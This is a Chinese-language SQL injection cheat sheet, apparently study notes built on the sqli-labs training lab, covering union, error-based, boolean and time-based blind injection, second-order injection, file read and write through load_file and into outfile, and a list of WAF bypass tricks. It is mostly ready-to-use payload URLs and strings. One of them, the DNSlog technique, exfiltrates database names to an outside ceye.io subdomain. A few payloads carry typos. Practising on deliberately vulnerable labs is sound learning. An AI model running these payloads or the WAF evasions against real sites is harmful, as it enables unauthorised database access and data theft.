sql注入+二次注入+WAF绕过技巧

//php 展示Sql语句
echo $sql;
确认位置
group by 1--+;

union 联合注入
查库
SELECT GROUP_CONCAT(schema_name )FROM information_schema.`SCHEMATA`

localhost/sqli-labs-master/Less-1/?id=-2' union select 1,2,(SELECT GROUP_CONCAT(schema_name )FROM information_schema.`SCHEMATA`) --+

 

查表
SELECT GROUP_CONCAT(table_name) FROM information_schema.`TABLES` WHERE table_schema=database

localhost/sqli-labs-master/Less-1/?id=-2' union select 1,2,(SELECT GROUP_CONCAT(table_name) FROM information_schema.`TABLES` WHERE table_schema='security'/database) --+

 

查列
SELECT GROUP_CONCAT(column_name) FROM information_schema.`COLUMNS` WHERE table_name='columns_priv'

localhost/sqli-labs-master/Less-1/?id=-2' union select 1,2,(SELECT GROUP_CONCAT(column_name) FROM information_schema.`COLUMNS` WHERE table_name='users') --+

查数据
select group_concat(CHARACTER_SET_NAME,DEFAULT_COLLATE_NAME,DESCRIPTION,MAXLEN) from CHARACTER_SETS


localhost/sqli-labs-master/Less-1/?id=-2' union select 1,2,(select concat_ws('~',id,username,password) from users limit 0,1) --+

读文件
select load_file('路径')

写文件
select '文件内容' into outfile'路径+文件名称'


报错注入
SELECT EXTRACTVALUE(1,CONCAT('~',(SELECT USER()),'~'))

SELECT UPDATEXML (1,CONCAT('~',(SELECT USER()),'~'),1)

http://localhost/sqli-labs-master/Less-1/?id=1%27%20and%20(SELECT%20EXTRACTVALUE(1,CONCAT(%27~%27,(SELECT%20USER()),%27~%27)))%20--+

http://localhost/sqli-labs-master/Less-1/?id=1%27%20and%20(SELECT%20UPDATEXML%20(1,CONCAT(%27~%27,(SELECT%20USER()),%27~%27),1))%20--+

布尔盲注(ASCII),杜绝单引号

LEFT(SELECT DATABASE(),1)='s'

http://localhost/sqli-labs-master/Less-8/?id=1' and LEFT((select DATABASE()),1)='S'--+

http://localhost/sqli-labs-master/Less-8/?id=1' and LEFT((SELECT table_name FROM information_schema.`TABLES` WHERE table_schema=database() limit 0,1),2)='em'--+

SELECT USER() REGEXP '^roo'
SELECT USER() LIKE 'ro%'

//(ASCII码)盲注,常用,看返回的是正确还是错误的信息,核心是ASCII(*)=*
SELECT ASCII (SUBSTR((SELECT DATABASE()),1,1))=109

http://localhost/sqli-labs-master/Less-8/?id=1' and ASCII ( SUBSTR((SELECT DATABASE()),1,1))=115--+

//查询表名 ,从第二开始,截取一个
http://localhost:8080/sqli-labs-master/Less-8/?id=1' and ASCII ( SUBSTR((SELECT table_name FROM information_schema.`TABLES` WHERE table_schema=database() limit 0,1),2,1))=109--+

http://localhost/sqli-labs-master/Less-1/?id=1' SELECT LEFT(DATABASE(),1)='s'--+

//时间盲注,核心语句是sleep,看响应时间
http://localhost/sqli-labs-master/Less-10/?id=1"and if(left(User(),1)='a',0,sleep(5))--+

SELECT IF((SELECT LEFT((SELECT table_name FROM information_schema.`TABLES` WHERE table_schema=DATABASE() LIMIT 0,1),1)='o'),0,SLEEP(5))

http://localhost:8080/sqli-labs-master/Less-10/?id=1"and IF(LEFT((SELECT table_name FROM information_schema.`TABLES` WHERE table_schema=DATABASE() LIMIT 0,1),1)='q',0,SLEEP(5))--+

Dnlog盲注
因为时间盲注请求太多,并且容易被禁止,所以使用Dnlog盲注
访问:http://ceye.io/profile
核心语法(服务器 需要时win系统)
Select LOAD_FILE(CONCAT('\\\\',(select database()),'.MySQL.
r4ourp.ceye.io\\abc'));

二次注入(注册,修改信息页面)
利用从数据库插/取数据,不验证信息的漏洞
admin'#
1' union select 1,(SELECT GROUP_CONCAT(schema_name )FROM information_schema.`SCHEMATA`),2#

绕过WAF
原理:
1.架构层绕过WAF
1,寻找源站->针对云WAF
2,利用同网段->绕过WAF防护区域
3,利用边界漏洞->绕过WAF防护区域
2.资源限制角度绕过WAF
1,POST大BODY
3.协议层面绕过WAF的检测
1,协议未覆盖绕过WAF
请求方式变换:GET->POST
Content-Type变换 : application/x-www-from-urlencoded;->multipart/from-data;
2,参数污染
4.规则层面绕过
主要方式
1.sql注释符绕过
union/**/select
union/*aaaa%01bbs*/select
union/*AAAAAAAAAAAAAAAAAA*/select
内连注释:/*!XXX*/
2.空白符绕过
MySQL空白符:%09,%0A,%0B,%0D,%20,%0C,%A0,/*xxx*/
正则空白符: %09,%0A,%0B,%0D,%20
union%250Cselect
3.函数分割符号
concat%2520(
concat/**/(
concat%250C(
concat%25a0(
4.浮点数词数解析
select * fron Users where id=8E0union select 1,2,3
select * from users where id=8.0union select 1,2,3
select * from users where id=\Nunion select 1,2,3
5.利用error-based进行SQL注入:Error-based SQL注入函数非常容易被忽略
extractvalue(1,concat(0x5c,md5(3)));
updatexml(1,concat(0x5d,md5(3)),1);
GeometryCollection((select*from(select*from(select@@version)f)x))
polygon((select*from(select name_const(varsion(),1))x))
linestring()
multipoint()
multilinestring()
multipolygon()
6.mysql特殊用法
select{x table_name}from{x information_schema.tables};